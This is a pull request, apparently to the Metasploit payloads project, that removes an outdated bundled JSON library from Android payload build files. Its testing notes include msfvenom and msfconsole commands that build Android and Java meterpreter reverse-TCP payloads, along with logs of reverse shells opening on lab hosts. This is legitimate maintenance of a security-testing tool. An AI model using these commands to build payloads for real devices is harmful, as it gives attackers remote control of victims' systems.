### PR TITLE
Update android json dependencies

### DIFF
--- a/java/androidpayload/app/pom.xml
+++ b/java/androidpayload/app/pom.xml
@@ -21,6 +21,18 @@
 			<artifactId>android</artifactId>
 			<version>2.3.3</version>
 			<scope>provided</scope>
+			<exclusions>
+				<exclusion>
+					<groupId>org.json</groupId>
+					<artifactId>json</artifactId>
+				</exclusion>
+			</exclusions>
+		</dependency>
+		<dependency>
+			<groupId>org.json</groupId>
+			<artifactId>json</artifactId>
+			<version>20231013</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>com.metasploit</groupId>

--- a/java/androidpayload/app/pom.xml
+++ b/java/androidpayload/app/pom.xml
@@ -29,12 +29,6 @@
 			</exclusions>
 		</dependency>
 		<dependency>
-			<groupId>org.json</groupId>
-			<artifactId>json</artifactId>
-			<version>20231013</version>
-			<scope>provided</scope>
-		</dependency>
-		<dependency>
 			<groupId>com.metasploit</groupId>
 			<artifactId>Metasploit-Java-Shared</artifactId>
 			<version>${project.version}</version>

--- a/java/androidpayload/library/pom.xml
+++ b/java/androidpayload/library/pom.xml
@@ -29,12 +29,6 @@
 			</exclusions>
 		</dependency>
 		<dependency>
-			<groupId>org.json</groupId>
-			<artifactId>json</artifactId>
-			<version>20231013</version>
-			<scope>provided</scope>
-		</dependency>
-		<dependency>
 			<groupId>com.metasploit</groupId>
 			<artifactId>Metasploit-JavaPayload</artifactId>
 			<version>${project.version}</version>

--- a/java/androidpayload/library/pom.xml
+++ b/java/androidpayload/library/pom.xml
@@ -21,6 +21,18 @@
 			<artifactId>android</artifactId>
 			<version>4.1.1.4</version>
 			<scope>provided</scope>
+			<exclusions>
+				<exclusion>
+					<groupId>org.json</groupId>
+					<artifactId>json</artifactId>
+				</exclusion>
+			</exclusions>
+		</dependency>
+		<dependency>
+			<groupId>org.json</groupId>
+			<artifactId>json</artifactId>
+			<version>20231013</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>com.metasploit</groupId>

--- a/java/version-compatibility-check/android-api/pom.xml
+++ b/java/version-compatibility-check/android-api/pom.xml
@@ -24,12 +24,6 @@
 				</exclusion>
 			</exclusions>
 		</dependency>
-		<dependency>
-			<groupId>org.json</groupId>
-			<artifactId>json</artifactId>
-			<version>20231013</version>
-			<scope>provided</scope>
-		</dependency>
 	</dependencies>
 	<build>
 		<plugins>

--- a/java/version-compatibility-check/android-api/pom.xml
+++ b/java/version-compatibility-check/android-api/pom.xml
@@ -16,6 +16,19 @@
 			<groupId>com.google.android</groupId>
 			<artifactId>android</artifactId>
 			<version>4.1.1.4</version>
+			<scope>provided</scope>
+			<exclusions>
+				<exclusion>
+					<groupId>org.json</groupId>
+					<artifactId>json</artifactId>
+				</exclusion>
+			</exclusions>
+		</dependency>
+		<dependency>
+			<groupId>org.json</groupId>
+			<artifactId>json</artifactId>
+			<version>20231013</version>
+			<scope>provided</scope>
 		</dependency>
 	</dependencies>
 	<build>


### PR DESCRIPTION
This removes the [20080701](https://mvnrepository.com/artifact/org.json/json/20080701) json library version included with com.google.android version 4.1.1.4 ~and replaces it with the json.org json library version 20231013~.  As it turns out, we don't use the json library; the securest code is no code, so removed the dependency.

The older json library contained in the default android library has some vulnerabilities.  This should make it so that we don't have to wait for Google to update their library, though I don't believe they have any intention to do so given the age of the library in question.

# Testing
- [x] install android-studio on a physical host you have a direct connection to (android studio fails strangely if you are using RDP, for instance, and it did not work for me on a virtualized host).
- [x] Install a supported version of android on the emulator.  I used the Pixel 4 running android 7.  The SDK versoin we use is 17, so it will need to be an older OS version.
- [x] `./msfvenom -p android/meterpreter/reverse_tcp LHOST=10.5.135.201 LPORT=4444 -o msf.apk`  (I had some trouble building this in the console)
- [x] verify you built with the new code:
```
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/android/apk/classes.dex is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/android/apk/AndroidManifest.xml is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/android/apk/resources.arsc is being used
No encoder specified, outputting raw payload
Payload size: 10236 bytes

```
- [x] Start payload handler in msfconsole
- [x] Copy payload over to the host running Android Stuido
- [x] Drag/drop the apk into the emulator
- [x] The apk should install and there should be an app called `MainActivity`
- [x] Click on `MainActivity` or whatever you called the app

### Java
- [x] Build Java meterpreter
- [x] generate java meterpreter payload: 
```
msf6 payload(android/meterpreter/reverse_tcp) > use payload/java/meterpreter/reverse_tcp
msf6 payload(java/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(java/meterpreter/reverse_tcp) > set lport 5678
lport => 5678
msf6 payload(java/meterpreter/reverse_tcp) > generate -f jar -o revtcp_java_5678.jar
```
- [x] `to_handler`
- [x] upload to target with java installed
- [x] `java -jar <payload>.jar`
- [x] run some of the test modules (I ran the Meterpreter test module and some others)


### Android Example Run
```
msf6 payload(android/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(android/meterpreter/reverse_tcp) > to_handler
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/android/apk/classes.dex is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/android/apk/AndroidManifest.xml is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/android/apk/resources.arsc is being used
[*] Payload Handler Started as Job 0
msf6 payload(android/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.201:4444 
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/android/metstage.jar is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/android/meterpreter.jar is being used
[*] Sending stage (71435 bytes) to 10.5.130.101
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.130.101:55223) at 2024-05-22 17:39:10 -0500

msf6 payload(android/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : localhost
OS              : Android 7.0 - Linux 3.10.0+ (i686)
Architecture    : x86
System Language : en_US
Meterpreter     : dalvik/android
meterpreter > getuid
Server username: u0_a79
meterpreter > pwd
/data/user/0/com.metasploit.stage/files
meterpreter > ls
No entries exist in /data/user/0/com.metasploit.stage/files
```

### Java Example Run
```
msf6 payload(java/meterpreter/reverse_tcp) > WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/java/com/metasploit/meterpreter/JarFileClassLoader.class is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used
[*] Sending stage (58012 bytes) to 10.5.134.167
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 2 opened (10.5.135.201:5678 -> 10.5.134.167:49988) at 2024-05-23 15:31:28 -0500

msf6 payload(java/meterpreter/reverse_tcp) > sessions -i 1
[-] Invalid session identifier: 1
msf6 payload(java/meterpreter/reverse_tcp) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 10.0 (x86)
Architecture    : x86
System Language : en_US
Meterpreter     : java/windows
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 2...
msf6 payload(java/meterpreter/reverse_tcp) > loadpath test/modules/
Loaded 43 modules:
    14 auxiliary modules
    13 exploit modules
    16 post modules
msf6 payload(java/meterpreter/reverse_tcp) > use post/test/meterpreter 
msf6 post(test/meterpreter) > set session 2
session => 2
msf6 post(test/meterpreter) > run

[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0; Skipped: 0
[*] Post module execution completed
msf6 post(test/meterpreter) > use post/test/file 
msf6 post(test/file) > run
[-] Post failed: Msf::OptionValidateError One or more options failed to validate: SESSION.
msf6 post(test/file) > set session 2
session => 2
msf6 post(test/file) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should write binary data
[+] should read the binary data we just wrote
[+] should delete binary files
[+] should append binary data
[+] should test for file existence
[+] should create text files
[+] should read the text we just wrote
[+] should append text files
[+] should delete text files
[+] should move files
[+] should test for directory existence
[+] should create directories
[+] should list the directory we just made
[+] should recursively delete the directory we just made
[-] [should delete a symbolic link target] failed to create the symbolic link
[+] should delete a symbolic link target
[+] should not recurse into symbolic link directories
[*] Passed: 16; Failed: 0; Skipped: 0
[*] Post module execution completed
msf6 post(test/file) > use post/test/cmd_exec 
msf6 post(test/cmd_exec) > set session 2
session => 2
msf6 post(test/cmd_exec) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[+] should return the result of echo
[*] Passed: 4; Failed: 0; Skipped: 0
[*] Post module execution completed

```